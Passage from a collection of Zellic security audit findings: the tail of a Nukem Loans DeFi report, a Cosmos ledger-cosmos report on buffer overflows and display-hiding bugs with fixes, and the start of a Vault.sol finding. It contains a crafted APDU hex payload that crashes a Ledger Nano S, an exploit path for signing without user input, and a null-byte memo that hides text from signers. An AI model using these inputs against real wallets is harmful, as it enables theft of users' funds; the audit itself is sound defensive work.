price five minutes ago and the current market price. If the price goes up substantially relative to the price in the signature five minutes ago, there may be an edge case where a user can actually borrow more capital than the price of their collateral. For markets that have a high collateralization ratio, this can be especially risky because in addition to that, AMM oracles can be manipulated to a certain extent (limited by validatePrice) in the protocol. Zellic Nukem Loans For some market configurations that have a 90% collateralization rate and 95% liquidation rate, the delta allowed for the underlying AMM is ~5%. 
A malicious user constantly polling for signatures would have to wait for one instance of such a price movement in the market in order to execute such an arbitrage. With the current architecture, such attacks will always be possible in case of drastic price movements in the five-minute period. However, the goal here is to make this unlikely, by either reducing maximum collateralization rates or reducing the deadline time period such that the required price movement is almost impossible in the time period. The Nukem team agreed with this finding and decided to lower collateralization rates in existing market configurations. The team plans to add additional mitigations in a future update. Zellic Nukem Loans 3.5 [FIXED] Slippage is set to zero during swap Target: Credit, Collateral Category: Business Logic Likelihood: High Severity: High Impact: High Multiple slippage checks are set to zero when performing a token swap. This is hazardous because it could allow users to trade at 100% slippage rates. swapper.swap(asset_, address(this), receiver, amount, 0); We recommend passing a nonzero slippage parameter for the swap function and making sure that the user is aware of the slippage rate. This issue was fixed by enforcing a 2% maximum slippage from the reference value of the swap provided by the signed reserves, added in commit 571dbc66. Zellic Nukem Loans 3.6 [FIXED] EIP-712 replayable signature in case of fork Target: EIP712 Category: Business Logic Likelihood: Low Severity: High Impact: High EIP-712 is a standard for the hashing and signing of typed, structured data. The standard code does not allow replaying signatures in case of a fork by default, as it rebuilds the domain separator in case the cached address of the contract and the cached chain ID differ from current values. However, in the case of the project\u2019s implementation, the aforementioned checks are removed. The domain separator will not be updated in case of a fork, and the signature can be replayed. function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _cachedThis && block.chainid == _cachedChainId) { return _cachedDomainSeparator; } else { return _buildDomainSeparator(); } } Even though the signatures can be replayed, the impact of this issue is relatively limited due to time constraints, mainly affecting the ERC20Permit implementation, which has direct access to user funds. The other contracts that use EIP-712 for verifying signatures do not allow performing actions on behalf of other users, so the impact there is limited to a user\u2019s own actions. We recommend using the default implementation of the EIP-712 standard to remove the possibility of replaying signatures in case of a fork. Zellic Nukem Loans The Nukem team remediated this issue in commit 46abe2cd by always rebuilding the domain separator. Zellic Nukem Loans 3.7 [FIXED] Assure debtors are auctionable Target: Auctions Category: Business Logic Likelihood: Low Severity: Medium Impact: Medium The Auctions contract handles the liquidation of debtors. The groupedLiquidation function is used by the owner of the contract to liquidate multiple debtors at once. However, it does not check that the debtors are auctionable, which means that if the owner of the contract by mistake passes a nonauctionable debtor, the liquidation will still be performed, and the debtors will be left in an inconsistent state. 
function groupedLiquidation( address market, address[] memory debtors ) external returns (uint256 liquidated, uint256 tip) { require( (_msgSender() == owner()) || // owner attributes[_msgSender()].has(Role.EXECUTE_AUCTION), \"authorizer\" ); (liquidated, tip) = IMarket(market).credit().liquidate( debtors, _msgSender() ); emit GroupedLiquidations( market, block.timestamp, debtors, liquidated, tip, _msgSender() ); } Zellic Nukem Loans Since this function is a privileged function, the impact is limited to the owner of the contract. However, it can still lead to an inconsistent state of the debtors, which can lead to further unexpected behavior. We recommend individually checking that each debtor is auctionable before performing the grouped liquidation. For example, function groupedLiquidation( address market, address[] memory debtors ) external returns (uint256 liquidated, uint256 tip) { for(uint256 i = 0; i < debtors.length; i++) { require(isAuctionable(market, debtors[i]), \"not auctionable\"); } // ... } The Nukem team fixed this finding in commit 571dbc66 by ensuring every debtor is auctionable. Zellic Nukem Loans 3.8 [FIXED] User\u2019s max collateralization is limited by the size of the market Target: Collateral Category: Business Logic Likelihood: Low Severity: Low Impact: Low Liquidations in the protocol affect the underlying AMM, which may cause more liquidations. This is a cascading effect. To counteract this, the worth of user collateral is calculated conservatively (the swap price is calculated as if one liquidation would set off all the liquidations). This works; however, it devalues the user collateral, and this effect becomes worse as the market grows relative to the underlying pool. Users risk more collateral for smaller loans and may be able to borrow less than expected. Re-architect the conservative value calculations to only account for positions that a liquidation would actually put at risk. The Nukem team has acknowledged this issue and will put it as an objective in their road map once markets start becoming large relative to their underlying pools. Zellic Nukem Loans", "html_url": "https://github.com/Zellic/publications/blob/master/Nukem Loans - Zellic Audit Report.pdf" }, { "title": "3.1 Buffer overflow in Unicode expansion", "labels": [ "Zellic" ], "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical The tx_display_translation function in tx_display.c performs a translation of characters from src into characters written to dst. The purpose is to substitute ASCII control characters with their escape sequence equivalents and transform non-ASCII characters into their Unicode escape sequence equivalents. Any trailing whitespace or '@' characters in src are included in the result if the dst buffer is long enough. Once the translation is complete, the dst buffer is terminated with a null character. The length of the src buffer is denoted by srcLen, and the length of the dst buffer is denoted by dstLen. 
The function constantly checks the bounds of the dst buffer by running the ASSERT_PTR_BOUNDS macro, which increments a count variable and compares it against dstLen: #define ASSERT_PTR_BOUNDS(count, dstLen) \\ count++; \\ if(count > dstLen) { \\ return parser_transaction_too_big; \\ } \\ // [...] parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) { // [...] uint8_t count = 0; // [...] } However, count is a uint8_t while dstLen is a uint16_t, meaning the pointer bounds 
For example, consider the following APDU, which inserts the previously mentioned JSON message: 55020201f7a10181a10278f05a5a5a5ac3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3 bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf c3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3 bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf c3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3 bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf c3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf41424344 Entering the APDU would cause the crash in Figure 1 (where the screenshot is from debugging the \u201cNano S\u201d target). Figure 2 shows the backtrace (keep in mind that many functions are inlined). This demonstrates we have control of multiple register values, not just PC. Note again that we do not control all bytes in the payload because non-ASCII bytes get expanded. The easiest exploit path here would be to create some valid transac- tion that contains, for example, a MEMO element at the end that triggers the over- flow, making the app jump straight to the verification routine and immediately sign the transaction without any user input. As long as the validator comes up with the same CBOR data as the Ledger app signed, starting from a given TX, this signature will be accepted. However, jumping to this area is not necessarily easy to do. Some devices may support PIE/PIC, which complicates exploitation. When testing on real Ledger devices, we found that PIC address layout is static for a single appli- cation and even persists across reboots. Fortunately, the address depends on some unknowns such as the number of apps previously installed on the device, their sizes, and so forth. Installing the same app over and over seemed to increase the PIC address in a de- terministic way, but without any means of leaking this address, exploitation seems difficult. But an attacker only has to be lucky once. Zellic Cosmos Network Figure 1: A crafted APDU causes a buffer overflow on a Nano S. Figure 2: We obtain a backtrace from the buffer overflow shown in Figure 1. Zellic Cosmos Network Change the declaration of count to a uint16_t: parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) { /) [...))] uint8_t count = 0; uint16_t count = 0; /) [...))] } This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Null-terminated strings enable trickery attacks", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: High Severity: High : High The tx_display_translation function copies the src buffer to dst, incrementing the pointer p each iteration, formatting bytes as desired. However, since the src buffer can contain a null byte, the while loop may be stopped early: parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) { MEMZERO(dst, dstLen); char *p = src; uint8_t count = 0; uint8_t verified_bytes = 0; while (*p) { utf8_int32_t tmp_codepoint = 0; p = utf8codepoint(p, &tmp_codepoint); /) [...))] } ///)) [...))] } Placing a null byte in a string that gets displayed may hide information. 
For example, consider the following transaction:

data = {1: [{1: 'Chain id', 2: 'my-chain'},
    {1: 'Account number', 2: '1'},
    {1: 'Sequence', 2: '2'},
    {1: 'Address', 2: 'cosmos1ulav3hsenupswqfkw2y3sup5kgtqwnvqa8eyhs', 4: True},
    {1: 'Public key', 2: '/cosmos.crypto.secp256k1.PubKey', 4: True},
    {2: 'PubKey object', 3: 1, 4: True},
    {1: 'Key', 2: '02EB DD7F E4FD EB76 DC8A 205E F65D 790C D30E 8A37 5A5C 2528 EB3A 923A F1FB 4D79 4D', 3: 2, 4: True},
    {2: 'This transaction has 1 Message'},
    {1: 'Message (1/1)', 2: '/cosmos.bank.v1beta1.MsgSend', 3: 1},
    {2: 'MsgSend object', 3: 2},
    {1: 'From address', 2: 'cosmos1ulav3hsenupswqfkw2y3sup5kgtqwnvqa8eyhs', 3: 3},
    {1: 'To address', 2: 'cosmos1ejrf4cur2wy6kfurg9f2jppp2h3afe5h6pkh5t', 3: 3},
    {1: 'Amount', 2: '10 ATOM', 3: 3},
    {2: 'End of Message'},
    {1: 'Memo', 2: 'GG\\0I hereby declare war on Arstotzka!'},
    {1: 'Fees', 2: '0.002 ATOM'},
    {1: 'Gas limit', 2: "100'000", 4: True},
    {1: 'Hash of raw bytes', 2: '9c043290109c270b2ffa9f3c0fa55a090c0125ebef881f7da53978dbf93f7385', 4: True}
]}

The null byte in Memo would conceal the declaration of war from the country signing the transaction on the Ledger device, as shown in Figure 3.

Figure 3: The declaration of war against Arstotzka is hidden on the Ledger device.

In general, important information may be concealed from the signer by inserting a null byte in a field that is displayed. Instead of checking if *p is null, check that we have not consumed the entire src buffer:

parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) {
    MEMZERO(dst, dstLen);
    char *p = src;
    uint8_t count = 0;
    uint8_t verified_bytes = 0;
    while (*p) {
    while (p < src + srcLen) {
        // [...]
    }
    // [...]
}

This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit fb90358d.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.3 Some bytes are not displayed", "labels": [ "Zellic" ], "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: Medium Severity: High Impact: High

When tx_display_translation is encoding the src buffer to dst, any bytes less than 0x0F will be caught in the following branch:

if (tmp_codepoint < 0x0F) {
    for (size_t i = 0; i < array_length(ascii_substitutions); i++) {
        if ((char)tmp_codepoint == ascii_substitutions[i].ascii_code) {
            *dst++ = '\\\\';
            ASSERT_PTR_BOUNDS(count, dstLen);
            *dst++ = ascii_substitutions[i].str;
            ASSERT_PTR_BOUNDS(count, dstLen);
            break;
        }
    }
}
// [...]

However, if the byte is not found in the following ascii_substitutions array, nothing will be written to the buffer:

static const ascii_subst_t ascii_substitutions[] = {
    {0x07, 'a'}, {0x08, 'b'}, {0x0C, 'f'}, {0x0A, 'n'},
    {0x0D, 'r'}, {0x09, 't'}, {0x0B, 'v'}, {0x5C, '\\\\'},
};

Any 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, or 0x0E bytes in the src buffer will not be represented in the dst buffer, potentially misleading users into signing a transaction they do not expect.
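A short, self-contained sketch (hypothetical; simplified from the branch above) shows the drop in action: control bytes without a table entry simply vanish from the output:

#include <stdio.h>
#include <string.h>

typedef struct { char ascii_code; char str; } ascii_subst_t;

static const ascii_subst_t ascii_substitutions[] = {
    {0x07, 'a'}, {0x08, 'b'}, {0x0C, 'f'}, {0x0A, 'n'},
    {0x0D, 'r'}, {0x09, 't'}, {0x0B, 'v'}, {0x5C, '\\\\'},
};

int main(void) {
    const char src[] = "A\\x01B\\x0E" "C"; // 0x01 and 0x0E have no table entry
    char dst[16] = {0};
    char *out = dst;
    for (size_t i = 0; i + 1 < sizeof(src); i++) {
        char c = src[i];
        if ((unsigned char)c < 0x0F) {
            for (size_t j = 0; j < sizeof(ascii_substitutions) / sizeof(*ascii_substitutions); j++) {
                if (c == ascii_substitutions[j].ascii_code) {
                    *out++ = '\\\\';
                    *out++ = ascii_substitutions[j].str;
                    break;
                }
            }
            // no fallback branch: unmatched control bytes are silently skipped
        } else {
            *out++ = c;
        }
    }
    printf("input: 5 bytes, output: %s (%zu bytes)\\n", dst, strlen(dst));
    return 0;
}

The five-byte input renders as the three-byte string ABC, with no trace of the two control bytes.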
If the for loop does not find the ASCII substitution character, output it as a hex escape in \\xNN format:

if (tmp_codepoint < 0x0F) {
    uint8_t found = 1;
    for (size_t i = 0; i < array_length(ascii_substitutions); i++) {
    for (size_t i = 0; i < array_length(ascii_substitutions) || (found = false); i++) {
        if ((char)tmp_codepoint == ascii_substitutions[i].ascii_code) {
            *dst++ = '\\\\';
            ASSERT_PTR_BOUNDS(count, dstLen);
            *dst++ = ascii_substitutions[i].str;
            ASSERT_PTR_BOUNDS(count, dstLen);
            break;
        }
    }
    if (!found) {
        // Write out the value as a hex escape, \\xNN
        count += 4;
        if (count > dstLen) {
            return parser_unexpected_value;
        }
        snprintf(dst, 4, "\\\\x%.02X", tmp_codepoint);
        dst += 4;
    }
}
// [...]

This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit fb90358d.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.4 Backslash characters are not escaped", "labels": [ "Zellic" ], "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: Medium Severity: Low Impact: Low

The tx_display_translation function is responsible for escaping bytes such as newlines. The following is a mapping of a byte to the suffix, which is appended after a '\\' character:

static const ascii_subst_t ascii_substitutions[] = {
    {0x07, 'a'}, {0x08, 'b'}, {0x0C, 'f'}, {0x0A, 'n'},
    {0x0D, 'r'}, {0x09, 't'}, {0x0B, 'v'}, {0x5C, '\\\\'},
};

The following code performs the escaping that is done using the ascii_substitutions array:

if (tmp_codepoint < 0x0F) {
    for (size_t i = 0; i < array_length(ascii_substitutions); i++) {
        if ((char)tmp_codepoint == ascii_substitutions[i].ascii_code) {
            *dst++ = '\\\\';
            ASSERT_PTR_BOUNDS(count, dstLen);
            *dst++ = ascii_substitutions[i].str;
            ASSERT_PTR_BOUNDS(count, dstLen);
            break;
        }
    }
}
// [...]

Because of the if (tmp_codepoint < 0x0F) condition, the 0x5C byte is never substituted with \u201c\\\\\u201d. The backslash character ('\\', ASCII 0x5C) will never be escaped, meaning two different inputs can have the same canonical, textual representation. For example, consider the following data:

{1: [ {1: "Chain id", 2: "lol\\\\u00FF\\xff"} ]}

The display would look as shown in Figure 4.

Figure 4: The backslash character is not properly escaped.

The \u201cfake\u201d and legitimately escaped strings are indistinguishable on the device. Update the branch logic such that the 0x5C byte is considered for substitution:

if (tmp_codepoint < 0x0F) {
if (tmp_codepoint < 0x0F || tmp_codepoint == 0x5C) {
    for (size_t i = 0; i < array_length(ascii_substitutions); i++) {
        // [...]

This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.5 Buffer overflows in ledger-zxlib", "labels": [ "Zellic" ], "body": "Target: zxformat.h (ledger-cosmos dependency, ledger-zxlib) Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational

Though not specifically in scope, while browsing the ledger-zxlib dependency\u2019s source tree, we observed the following potential bugs.
In the pageStringHex function, the outValueLen and lastChunkLen variables are uint16_t, meaning their maximum values are 65535 (0xffff):

__Z_INLINE void pageStringHex(char *outValue, uint16_t outValueLen,
                              const char *inValue, uint16_t inValueLen,
                              uint8_t pageIdx, uint8_t *pageCount) {
    // [...]
    const uint16_t lastChunkLen = (msgHexLen % outValueLen);
    // [...]
    if (pageIdx < *pageCount) {
        if (lastChunkLen > 0 && pageIdx == *pageCount - 1) {
            array_to_hexstr(outValue, outValueLen,
                            (const uint8_t *)inValue + (pageIdx * (outValueLen / 2)),
                            lastChunkLen / 2);
        } else {
            array_to_hexstr(outValue, outValueLen,
                            (const uint8_t *)inValue + (pageIdx * (outValueLen / 2)),
                            outValueLen / 2);
        }
    }
}

The last parameter of the array_to_hexstr function is count, which is a uint8_t, meaning the lastChunkLen/2 and outValueLen/2 arguments (both of which have potential maximum values of 32767, or 0xffff/2) will be cast to uint8_t, which can store a maximum of 255 (0xff). Though cast truncation is possible here, it would likely not be exploitable since the count controls the number of bytes written to the dst buffer. However, in array_to_hexstr, the following size check also contains an integer overflow bug:

__Z_INLINE uint32_t array_to_hexstr(char *dst, uint16_t dstLen, const uint8_t *src, uint8_t count) {
    MEMZERO(dst, dstLen);
    if (dstLen < (count * 2 + 1)) {
        return 0;
    }
    const char hexchars[] = "0123456789abcdef";
    for (uint8_t i = 0; i < count; i++, src++) {
        *dst++ = hexchars[*src >> 4u];
        *dst++ = hexchars[*src & 0x0Fu];
    }
    *dst = 0; // terminate string
    return (uint32_t)(count * 2);
}

Any count value greater than 127 ((0xff - 1)/2) will result in the count * 2 + 1 calculation overflowing, allowing the dst buffer length check to be bypassed and potentially enabling a dst buffer overflow. The pageStringHex function does not appear to be used by ledger-cosmos, so it does not present any immediate risk. Note that the array_to_hexstr function is used once but has a hardcoded count argument that is not high enough to overflow, so the bugs will not be triggered in this case:

char buf[18] = {0};
array_to_hexstr(buf, sizeof(buf), (uint8_t *) &swapped, 8);

Add checks to prevent the cast truncation and integer overflow. A fix was added to the zxlib dependency in commit 72bed6ab.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.6 Stack canary is chosen at compile time", "labels": [ "Zellic" ], "body": "Target: ledger-cosmos Category: Business Logic Likelihood: N/A Severity: Informational Impact: Informational

The stack canary (checked using the CHECK_APP_CANARY() macro) is simply a hardcoded value, 0xDEAD0031:

#define APP_STACK_CANARY_MAGIC 0xDEAD0031

#pragma clang diagnostic push
#pragma ide diagnostic ignored "EndlessLoop"
void handle_stack_overflow() {
    zemu_log("!!!!!!!!!!!!!!!!!!!!!! CANARY TRIGGERED!!! STACK OVERFLOW DETECTED\\n");
#if defined(TARGET_NANOS) || defined(TARGET_NANOX) || defined(TARGET_NANOS2)
    io_seproxyhal_se_reset();
#else
    while (1);
#endif
}
#pragma clang diagnostic pop

__Z_UNUSED void check_app_canary() {
#if defined(TARGET_NANOS) || defined(TARGET_NANOX) || defined(TARGET_NANOS2)
    if (app_stack_canary != APP_STACK_CANARY_MAGIC) handle_stack_overflow();
#endif
}

// [...]

An attacker can predict the value and potentially exploit buffer overflow vulnerabilities, bypassing this check.
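As an illustration of the recommendation that follows, a sketch of a boot-time canary is given below. It is hypothetical: cx_rng() is the BOLOS randomness primitive, but the exact wiring (where the canary word lives and when it is seeded) varies by SDK version, so treat this as an outline rather than a drop-in patch:

#include <stdint.h>
#include <stddef.h>

extern uint32_t app_stack_canary;                // word placed at the stack bottom
extern void cx_rng(uint8_t *buffer, size_t len); // BOLOS RNG (assumed available)
extern void handle_stack_overflow(void);

static uint32_t canary_secret; // chosen at boot, absent from the binary image

void init_app_canary(void) {
    cx_rng((uint8_t *)&canary_secret, sizeof(canary_secret));
    if (canary_secret == 0) {
        canary_secret = 0xDEAD0031; // avoid an all-zero canary
    }
    app_stack_canary = canary_secret;
}

void check_app_canary(void) {
    if (app_stack_canary != canary_secret) {
        handle_stack_overflow();
    }
}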
While the canary may help detect accidental buffer overflows, it provides little mitigation against intentional buffer overflow exploits. Consider choosing a random stack canary at runtime for additional safety. This issue has been acknowledged by Cosmos Network.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.7 Pointer bounds assertion after write leads to buffer overflow", "labels": [ "Zellic" ], "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational

The ASSERT_PTR_BOUNDS macro increments count then checks that the count is within the bounds of the buffer:

#define ASSERT_PTR_BOUNDS(count, dstLen) \\
    count++; \\
    if (count > dstLen) { \\
        return parser_transaction_too_big; \\
    }

However, the assertion is always placed after writing a byte (i.e., the code writes before checking the bounds), potentially causing a buffer overflow. A one-byte buffer overflow would likely be unexploitable. Ideally, the tx_display_translation function would return the parser_transaction_too_big error and cause the destination buffer to be unused, but the return value is unused per Finding 3.10. Check that the buffer is large enough (that the pointer is in bounds) before writing each byte. This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.8 Exception handler variables missing volatile keyword", "labels": [ "Zellic" ], "body": "Target: crypto.c, apdu_handler.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational

Per Ledger, one of the common pitfalls is in the exception handling. Their recommendation is:

When modifying variables within a try / catch / finally context, always declare those variables volatile. This will prevent the compiler from making invalid assumptions when optimizing your code because it doesn\u2019t understand how our exception model works.

Ledger has implemented exception handling through OS support, using os_longjmp to jump to magic addresses that the OS intercepts and translates. This is not very transparent to an optimizing compiler and could turn into a compile-time mistake if the code is not handling it. The examples mentioned in the troubleshooting guide are for changing the status of an error object during the catch context, then emitting it during finally or using it later. The same code pattern emerges in a few places in the ledger-cosmos repository.
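Before looking at the in-repo instances below, the hazard can be reproduced with nothing more than the standard library. In this hypothetical sketch, setjmp/longjmp stands in for the BOLOS TRY/CATCH macros; the C standard leaves non-volatile locals that were modified between setjmp() and longjmp() with indeterminate values after the jump, which is exactly what Ledger's guidance defends against:

#include <setjmp.h>
#include <stdio.h>

static jmp_buf env;

static void may_throw(int fail) {
    if (fail) {
        longjmp(env, 1); // the moral equivalent of THROW
    }
}

static int run(int fail) {
    volatile int err = 0;   // without volatile, err may live only in a register
    if (setjmp(env) == 0) { // TRY
        err = 1;            // pessimistically record failure
        may_throw(fail);
        err = 0;            // only reached when nothing threw
    }                       // the CATCH path resumes here after longjmp
    return err;
}

int main(void) {
    printf("no throw: err=%d, throw: err=%d\\n", run(0), run(1));
    return 0;
}

With volatile, the throwing path reliably returns 1; without it, the value read back after the jump is indeterminate.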
For example, crypto.c variable err:

zxerr_t crypto_extractPublicKey(const uint32_t path[HDPATH_LEN_DEFAULT], uint8_t *pubKey, uint16_t pubKeyLen) {
    cx_ecfp_public_key_t cx_publicKey;
    cx_ecfp_private_key_t cx_privateKey;
    uint8_t privateKeyData[32];
    if (pubKeyLen < PK_LEN_SECP256K1) {
        return zxerr_invalid_crypto_settings;
    }
    zxerr_t err = zxerr_ok;
    BEGIN_TRY
    {
        TRY {
            os_perso_derive_node_bip32(CX_CURVE_256K1, path, HDPATH_LEN_DEFAULT, privateKeyData, NULL);
            cx_ecfp_init_private_key(CX_CURVE_256K1, privateKeyData, 32, &cx_privateKey);
            cx_ecfp_init_public_key(CX_CURVE_256K1, NULL, 0, &cx_publicKey);
            cx_ecfp_generate_pair(CX_CURVE_256K1, &cx_publicKey, &cx_privateKey, 1);
        }
        CATCH_OTHER(e) {
            err = zxerr_ledger_api_error;
        }
        FINALLY {
            MEMZERO(&cx_privateKey, sizeof(cx_privateKey));
            MEMZERO(privateKeyData, 32);
        }
    }
    END_TRY;
    if (err != zxerr_ok) {
        return err;
    }
    // More code here

apdu_handler.c variable sw:

void handleApdu(volatile uint32_t *flags, volatile uint32_t *tx, uint32_t rx) {
    uint16_t sw = 0;
    BEGIN_TRY
    {
        TRY {
            // ...
        }
        CATCH(EXCEPTION_IO_RESET) {
            THROW(EXCEPTION_IO_RESET);
        }
        CATCH_OTHER(e) {
            switch (e & 0xF000) {
                case 0x6000:
                case APDU_CODE_OK:
                    sw = e;
                    break;
                default:
                    sw = 0x6800 | (e & 0x7FF);
                    break;
            }
            G_io_apdu_buffer[*tx] = sw >> 8;
            G_io_apdu_buffer[*tx + 1] = sw;
            *tx += 2;
        }
        FINALLY {
        }
    }
    END_TRY;
}

With just minor optimizations enabled, the compiler can be confused and optimize away variable modifications that do not seem to have any clear side effects. These bugs usually surface near the end of the development cycle, when compiler optimizations are enabled to save on memory/flash footprint. The result could be that an actual error status is masked and the application continues on as if it were successful. In the case of the crypto.c example, this would lead to the wrong public key being calculated in crypto_fillAddress(). Do also note that the entire APDU handler runs everything inside a big exception handler loop, which means it can return there at any point, and great care has to be taken when accessing globals there. An example where it could return early is in crypto.c, where the function cx_hash_sha256() is called outside of a try/catch. It is recommended to use a function like cx_hash_no_throw() instead there to avoid a very deep return back to the APDU handler. Mark variables that can be changed inside exception handlers with the volatile keyword. Use functions like cx_hash_no_throw(), then return gracefully on error, or wrap error-throwing functions like cx_hash_sha256() in TRY/EXCEPT blocks where used. This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit fb90358d.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.9 Incorrect size check when encoding Unicode", "labels": [ "Zellic" ], "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational

The following code is part of the tx_display_translation function and converts a sequence of Unicode codepoints into a string of escaped UTF-8 characters:

*dst++ = '\\\\';
ASSERT_PTR_BOUNDS(count, dstLen);
uint8_t bytes_to_print = 8;
int32_t swapped = ZX_SWAP(tmp_codepoint);
if (tmp_codepoint > 0xFFFF) {
    *dst++ = 'U';
    ASSERT_PTR_BOUNDS(count, dstLen);
} else {
    *dst++ = 'u';
    ASSERT_PTR_BOUNDS(count, dstLen);
    bytes_to_print = 4;
    swapped = (swapped >> 16) & 0xFFFF;
}
if (dstLen < bytes_to_print) {
    return parser_unexpected_value;
}
char buf[18] = {0};
array_to_hexstr(buf, sizeof(buf), (uint8_t *) &swapped, 8);
for (int i = 0; i < bytes_to_print; i++) {
    *dst++ = (buf[i] >= 'a' && buf[i] <= 'z') ? (buf[i] - 32) : buf[i];
    ASSERT_PTR_BOUNDS(count, dstLen);
}

The following size check does not take into account the number of bytes already written to the dst buffer:

if (dstLen < bytes_to_print) {
    return parser_unexpected_value;
}

The following line in the for loop when copying the buf buffer to the dst buffer would catch a buffer overflow:

ASSERT_PTR_BOUNDS(count, dstLen);

So, the buffer overflow would be unexploitable. We recommend changing the size check to account for the number of bytes already written to the buffer:

if (dstLen < bytes_to_print) {
if (dstLen < bytes_to_print + count) {
    return parser_unexpected_value;
}

This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 5a7c3cfe.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.10 Return value of tx_display_translation is ignored", "labels": [ "Zellic" ], "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational

The return value of tx_display_translation is ignored. The function returns a parser_error_t if any abnormal behavior occurs:

parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen);

Errors may not be reported. Catch the returned errors, if any, and handle them as desired. This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.11 Missing pointer bounds checks in tx_display_translation", "labels": [ "Zellic" ], "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational

The following code is missing pointer bounds checks when writing the last two bytes:

if (src[srcLen - 1] == ' ' || src[srcLen - 1] == '@') {
    if (src[dstLen - 1] + 1 > dstLen) {
        return parser_unexpected_value;
    }
    *dst++ = '@';
}

// Terminate string
*dst = 0;

Also, the check inside the if statement seems to not do anything useful. It checks if the ASCII value of the last byte is at least 1 larger than the length of the destination buffer, and errors if it is. This is likely a coding mistake.
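To see why the check is ineffective, consider plugging plausible values into the condition; the sketch below (hypothetical values, not project code) shows that it compares a character read from src, indexed by the destination length, against that same length:

#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void) {
    char src[300];
    uint16_t dstLen = 300;
    memset(src, 'A', sizeof(src)); // 'A' is ASCII 0x41, i.e., 65

    // the finding's check: src[dstLen - 1] + 1 > dstLen
    if (src[dstLen - 1] + 1 > dstLen) {
        printf("rejects: would require a character value above 299\\n");
    } else {
        printf("passes: 65 + 1 > 300 is false; a byte's value says nothing "
               "about how many bytes remain in dst\\n");
    }
    return 0;
}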
There is a potential for a two-byte buffer overflow. However, the bytes are not fully controlled, and it is likely unexploitable. Add pointer bounds assertions:

if (src[srcLen - 1] == ' ' || src[srcLen - 1] == '@') {
    if (src[dstLen - 1] + 1 > dstLen) {
        return parser_unexpected_value;
    }
    ASSERT_PTR_BOUNDS(count, dstLen);
    *dst++ = '@';
}

// Terminate string
ASSERT_PTR_BOUNDS(count, dstLen);
*dst = 0;

This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 5a7c3cfe.
", "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" }, { "title": "3.1 The transferAVAX function allows arbitrary transfers", "labels": [ "Zellic" ], "body": "Target: Vault.sol Category: Business Logic Likelihood: Medium Severity: High Impact: High

The transferAVAX function is used to perform transfers of AVAX between two registered contracts.

function transferAVAX(
    string memory fromContractName,
    string memory toContractName,
    uint256 amount
) external onlyRegisteredNetworkContract {
